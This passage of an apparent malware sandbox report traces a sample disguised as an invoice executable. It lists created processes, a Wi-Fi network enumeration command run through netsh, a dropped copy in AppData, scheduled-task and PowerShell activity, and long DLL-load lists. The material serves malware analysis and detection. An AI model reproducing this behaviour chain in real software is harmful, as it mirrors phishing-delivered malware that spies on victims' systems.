Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
